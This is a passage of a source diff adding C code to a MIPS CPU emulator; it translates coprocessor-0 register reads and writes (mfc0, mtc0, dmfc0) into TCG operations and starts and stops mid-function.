"LLAddr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 18: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_1e0i(tcg_ctx, mfc0_watchlo, arg, sel); + rn = "WatchLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 19: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_1e0i(tcg_ctx, mfc0_watchhi, arg, sel); + rn = "WatchHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 20: + switch (sel) { + case 0: +#if defined(TARGET_MIPS64) + check_insn(ctx, ISA_MIPS3); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext)); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "XContext"; + break; +#endif + default: + goto cp0_unimplemented; + } + break; + case 21: + /* Officially reserved, but sel 0 is used for R1x000 framemask */ + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Framemask)); + rn = "Framemask"; + break; + default: + goto cp0_unimplemented; + } + break; + case 22: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "'Diagnostic"; /* implementation dependent */ + break; + case 23: + switch (sel) { + case 0: + gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */ + rn = "Debug"; + break; + case 1: +// gen_helper_mfc0_tracecontrol(arg); /* PDtrace support */ + rn = "TraceControl"; +// break; + case 2: +// gen_helper_mfc0_tracecontrol2(arg); /* PDtrace support */ + rn = "TraceControl2"; +// break; + case 3: +// gen_helper_mfc0_usertracedata(arg); /* PDtrace support */ + rn = "UserTraceData"; +// break; + case 4: +// gen_helper_mfc0_tracebpc(arg); /* PDtrace support */ + rn = "TraceBPC"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 24: + switch (sel) { + case 0: + /* EJTAG support */ + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "DEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 25: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Performance0)); + rn = "Performance0"; + break; + case 1: +// gen_helper_mfc0_performance1(arg); + rn = "Performance1"; +// break; + case 2: +// gen_helper_mfc0_performance2(arg); + rn = "Performance2"; +// break; + case 3: +// gen_helper_mfc0_performance3(arg); + rn = "Performance3"; +// break; + case 4: +// gen_helper_mfc0_performance4(arg); + rn = "Performance4"; +// break; + case 5: +// gen_helper_mfc0_performance5(arg); + rn = "Performance5"; +// break; + case 6: +// gen_helper_mfc0_performance6(arg); + rn = "Performance6"; +// break; + case 7: +// gen_helper_mfc0_performance7(arg); + rn = "Performance7"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 26: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "ECC"; + break; + case 27: + switch (sel) { + case 0: case 1: case 2: case 3: + tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ + rn = "CacheErr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 28: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagLo)); + rn = "TagLo"; + break; + case 1: + case 3: + case 5: + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataLo)); + rn = "DataLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 29: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_TagHi)); + rn = "TagHi"; + break; + case 1: + case 3: + case 5: + case 7: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DataHi)); + rn = "DataHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 30: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "ErrorEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 31: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); + rn = "DESAVE"; + break; + case 2: case 3: case 4: case 5: case 6: case 7: + CP0_CHECK(ctx->kscrexist & (1 << sel)); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, CP0_KScratch[sel-2])); + tcg_gen_ext32s_tl(tcg_ctx, arg, arg); + rn = "KScratch"; + break; + default: + goto cp0_unimplemented; + } + break; + default: + goto cp0_unimplemented; + } + (void)rn; /* avoid a compiler warning */ + LOG_DISAS("mfc0 %s (reg %d sel %d)\n", rn, reg, sel); + return; + +cp0_unimplemented: + LOG_DISAS("mfc0 %s (reg %d sel %d)\n", rn, reg, sel); + gen_mfc0_unimplemented(ctx, arg); +} + +static void gen_mtc0(DisasContext *ctx, TCGv arg, int reg, int sel) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *rn = "invalid"; + + if (sel != 0) + check_insn(ctx, ISA_MIPS32); + + //if (use_icount) + // gen_io_start(); + + switch (reg) { + case 0: + switch (sel) { + case 0: + gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Index"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "MVPControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + /* ignored */ + rn = "MVPConf1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 1: + switch (sel) { + case 0: + /* ignored */ + rn = "Random"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEConf1"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "YQMask"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_VPESchedule)); + rn = "VPESchedule"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_VPEScheFBack)); + rn = "VPEScheFBack"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "VPEOpt"; + break; + default: + goto cp0_unimplemented; + } + break; + case 2: + switch (sel) { + case 0: + gen_helper_mtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryLo0"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCStatus"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCBind"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCRestart"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCHalt"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCContext"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCSchedule"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TCScheFBack"; + break; + default: + goto cp0_unimplemented; + } + break; + case 3: + switch (sel) { + case 0: + gen_helper_mtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryLo1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 4: + switch (sel) { + case 0: + gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Context"; + break; + case 1: +// gen_helper_mtc0_contextconfig(tcg_ctx->cpu_env, arg); /* SmartMIPS ASE */ + rn = "ContextConfig"; + goto cp0_unimplemented; +// break; + case 2: + CP0_CHECK(ctx->ulri); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + rn = "UserLocal"; + break; + default: + goto cp0_unimplemented; + } + break; + case 5: + switch (sel) { + case 0: + gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageMask"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "PageGrain"; + break; + default: + goto cp0_unimplemented; + } + break; + case 6: + switch (sel) { + case 0: + gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Wired"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf0"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf1"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf2"; + break; + case 4: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf3"; + break; + case 5: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "SRSConf4"; + break; + default: + goto cp0_unimplemented; + } + break; + case 7: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); + ctx->bstate = BS_STOP; + rn = "HWREna"; + break; + default: + goto cp0_unimplemented; + } + break; + case 8: + switch (sel) { + case 0: + /* ignored */ + rn = "BadVAddr"; + break; + case 1: + /* ignored */ + rn = "BadInstr"; + break; + case 2: + /* ignored */ + rn = "BadInstrP"; + break; + default: + goto cp0_unimplemented; + } + break; + case 9: + switch (sel) { + case 0: + gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Count"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 10: + switch (sel) { + case 0: + gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EntryHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 11: + switch (sel) { + case 0: + gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Compare"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 12: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); + /* BS_STOP isn't good enough here, hflags may have changed. */ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Status"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "IntCtl"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSCtl"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "SRSMap"; + break; + default: + goto cp0_unimplemented; + } + break; + case 13: + switch (sel) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Cause"; + break; + default: + goto cp0_unimplemented; + } + break; + case 14: + switch (sel) { + case 0: + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_EPC)); + rn = "EPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 15: + switch (sel) { + case 0: + /* ignored */ + rn = "PRid"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "EBase"; + break; + default: + goto cp0_unimplemented; + } + break; + case 16: + switch (sel) { + case 0: + gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 1: + /* ignored, read only */ + rn = "Config1"; + break; + case 2: + gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config2"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case 3: + /* ignored, read only */ + rn = "Config3"; + break; + case 4: + gen_helper_mtc0_config4(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config4"; + ctx->bstate = BS_STOP; + break; + case 5: + gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Config5"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + /* 6,7 are implementation dependent */ + case 6: + /* ignored */ + rn = "Config6"; + break; + case 7: + /* ignored */ + rn = "Config7"; + break; + default: + rn = "Invalid config selector"; + goto cp0_unimplemented; + } + break; + case 17: + switch (sel) { + case 0: + gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "LLAddr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 18: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchlo, arg, sel); + rn = "WatchLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 19: + switch (sel) { + case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7: + gen_helper_0e1i(tcg_ctx, mtc0_watchhi, arg, sel); + rn = "WatchHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 20: + switch (sel) { + case 0: +#if defined(TARGET_MIPS64) + check_insn(ctx, ISA_MIPS3); + gen_helper_mtc0_xcontext(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "XContext"; + break; +#endif + default: + goto cp0_unimplemented; + } + break; + case 21: + /* Officially reserved, but sel 0 is used for R1x000 framemask */ + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + switch (sel) { + case 0: + gen_helper_mtc0_framemask(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Framemask"; + break; + default: + goto cp0_unimplemented; + } + break; + case 22: + /* ignored */ + rn = "Diagnostic"; /* implementation dependent */ + break; + case 23: + switch (sel) { + case 0: + gen_helper_mtc0_debug(tcg_ctx, tcg_ctx->cpu_env, arg); /* EJTAG support */ + /* BS_STOP isn't good enough here, hflags may have changed. */ + gen_save_pc(ctx, ctx->pc + 4); + ctx->bstate = BS_EXCP; + rn = "Debug"; + break; + case 1: +// gen_helper_mtc0_tracecontrol(tcg_ctx->cpu_env, arg); /* PDtrace support */ + rn = "TraceControl"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// break; + case 2: +// gen_helper_mtc0_tracecontrol2(tcg_ctx->cpu_env, arg); /* PDtrace support */ + rn = "TraceControl2"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// break; + case 3: + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// gen_helper_mtc0_usertracedata(tcg_ctx->cpu_env, arg); /* PDtrace support */ + rn = "UserTraceData"; + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; +// break; + case 4: +// gen_helper_mtc0_tracebpc(tcg_ctx->cpu_env, arg); /* PDtrace support */ + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + rn = "TraceBPC"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 24: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_DEPC)); + rn = "DEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 25: + switch (sel) { + case 0: + gen_helper_mtc0_performance0(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "Performance0"; + break; + case 1: +// gen_helper_mtc0_performance1(arg); + rn = "Performance1"; +// break; + case 2: +// gen_helper_mtc0_performance2(arg); + rn = "Performance2"; +// break; + case 3: +// gen_helper_mtc0_performance3(arg); + rn = "Performance3"; +// break; + case 4: +// gen_helper_mtc0_performance4(arg); + rn = "Performance4"; +// break; + case 5: +// gen_helper_mtc0_performance5(arg); + rn = "Performance5"; +// break; + case 6: +// gen_helper_mtc0_performance6(arg); + rn = "Performance6"; +// break; + case 7: +// gen_helper_mtc0_performance7(arg); + rn = "Performance7"; +// break; + default: + goto cp0_unimplemented; + } + break; + case 26: + /* ignored */ + rn = "ECC"; + break; + case 27: + switch (sel) { + case 0: case 1: case 2: case 3: + /* ignored */ + rn = "CacheErr"; + break; + default: + goto cp0_unimplemented; + } + break; + case 28: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taglo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagLo"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datalo(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataLo"; + break; + default: + goto cp0_unimplemented; + } + break; + case 29: + switch (sel) { + case 0: + case 2: + case 4: + case 6: + gen_helper_mtc0_taghi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "TagHi"; + break; + case 1: + case 3: + case 5: + case 7: + gen_helper_mtc0_datahi(tcg_ctx, tcg_ctx->cpu_env, arg); + rn = "DataHi"; + break; + default: + rn = "invalid sel"; + goto cp0_unimplemented; + } + break; + case 30: + switch (sel) { + case 0: + gen_mtc0_store64(ctx, arg, offsetof(CPUMIPSState, CP0_ErrorEPC)); + rn = "ErrorEPC"; + break; + default: + goto cp0_unimplemented; + } + break; + case 31: + switch (sel) { + case 0: + /* EJTAG support */ + gen_mtc0_store32(ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); + rn = "DESAVE"; + break; + case 2: case 3: case 4: case 5: case 6: case 7: + CP0_CHECK(ctx->kscrexist & (1 << sel)); + tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, CP0_KScratch[sel-2])); + rn = "KScratch"; + break; + default: + goto cp0_unimplemented; + } + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + default: + goto cp0_unimplemented; + } + (void)rn; /* avoid a compiler warning */ + LOG_DISAS("mtc0 %s (reg %d sel %d)\n", rn, reg, sel); + /* For simplicity assume that all writes can cause interrupts. */ + //if (use_icount) { + // gen_io_end(); + // ctx->bstate = BS_STOP; + //} + return; + +cp0_unimplemented: + LOG_DISAS("mtc0 %s (reg %d sel %d)\n", rn, reg, sel); +} + +#if defined(TARGET_MIPS64) +static void gen_dmfc0(DisasContext *ctx, TCGv arg, int reg, int sel) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *rn = "invalid"; + + if (sel != 0) + check_insn(ctx, ISA_MIPS64); + + switch (reg) { + case 0: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Index)); + rn = "Index"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpcontrol(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpconf0(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_mvpconf1(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "MVPConf1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 1: + switch (sel) { + case 0: + CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); + gen_helper_mfc0_random(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "Random"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEControl)); + rn = "VPEControl"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf0)); + rn = "VPEConf0"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEConf1)); + rn = "VPEConf1"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_YQMask)); + rn = "YQMask"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); + rn = "VPESchedule"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); + rn = "VPEScheFBack"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_VPEOpt)); + rn = "VPEOpt"; + break; + default: + goto cp0_unimplemented; + } + break; + case 2: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo0)); + rn = "EntryLo0"; + break; + case 1: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcstatus(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCStatus"; + break; + case 2: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_mfc0_tcbind(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCBind"; + break; + case 3: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tcrestart(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCRestart"; + break; + case 4: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tchalt(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCHalt"; + break; + case 5: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tccontext(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCContext"; + break; + case 6: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tcschedule(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCSchedule"; + break; + case 7: + CP0_CHECK(ctx->insn_flags & ASE_MT); + gen_helper_dmfc0_tcschefback(tcg_ctx, arg, tcg_ctx->cpu_env); + rn = "TCScheFBack"; + break; + default: + goto cp0_unimplemented; + } + break; + case 3: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryLo1)); + rn = "EntryLo1"; + break; + default: + goto cp0_unimplemented; + } + break; + case 4: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_Context)); + rn = "Context"; + break; + case 1: +// gen_helper_dmfc0_contextconfig(arg); /* SmartMIPS ASE */ + rn = "ContextConfig"; + goto cp0_unimplemented; +// break; + case 2: + CP0_CHECK(ctx->ulri); + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + rn = "UserLocal"; + break; + default: + goto cp0_unimplemented; + } + break; + case 5: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageMask)); + rn = "PageMask"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_PageGrain)); + rn = "PageGrain"; + break; + default: + goto cp0_unimplemented; + } + break; + case 6: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Wired)); + rn = "Wired"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0)); + rn = "SRSConf0"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1)); + rn = "SRSConf1"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2)); + rn = "SRSConf2"; + break; + case 4: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3)); + rn = "SRSConf3"; + break; + case 5: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4)); + rn = "SRSConf4"; + break; + default: + goto cp0_unimplemented; + } + break; + case 7: + switch (sel) { + case 0: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_HWREna)); + rn = "HWREna"; + break; + default: + goto cp0_unimplemented; + } + break; + case 8: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); + rn = "BadVAddr"; + break; + case 1: + CP0_CHECK(ctx->bi); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr)); + rn = "BadInstr"; + break; + case 2: + CP0_CHECK(ctx->bp); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP)); + rn = "BadInstrP"; + break; + default: + goto cp0_unimplemented; + } + break; + case 9: + switch (sel) { + case 0: + /* Mark as an IO operation because we read the time. */ + //if (use_icount) + // gen_io_start(); + gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env); + //if (use_icount) { + // gen_io_end(); + //} + /* Break the TB to be able to take timer interrupts immediately + after reading count. */ + ctx->bstate = BS_STOP; + rn = "Count"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 10: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi)); + rn = "EntryHi"; + break; + default: + goto cp0_unimplemented; + } + break; + case 11: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Compare)); + rn = "Compare"; + break; + /* 6,7 are implementation dependent */ + default: + goto cp0_unimplemented; + } + break; + case 12: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Status)); + rn = "Status"; + break; + case 1: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl)); + rn = "IntCtl"; + break; + case 2: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl)); + rn = "SRSCtl"; + break; + case 3: + check_insn(ctx, ISA_MIPS32R2); + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); + rn = "SRSMap"; + break; + default: + goto cp0_unimplemented; + } + break; + case 13: + switch (sel) { + case 0: + gen_mfc0_load32(ctx, arg, offsetof(CPUMIPSState, CP0_Cause)); + rn = "Cause"; + break; + default: + goto cp0_unimplemented; + } + break; + case 14: + switch (sel) { + case 0: + tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, 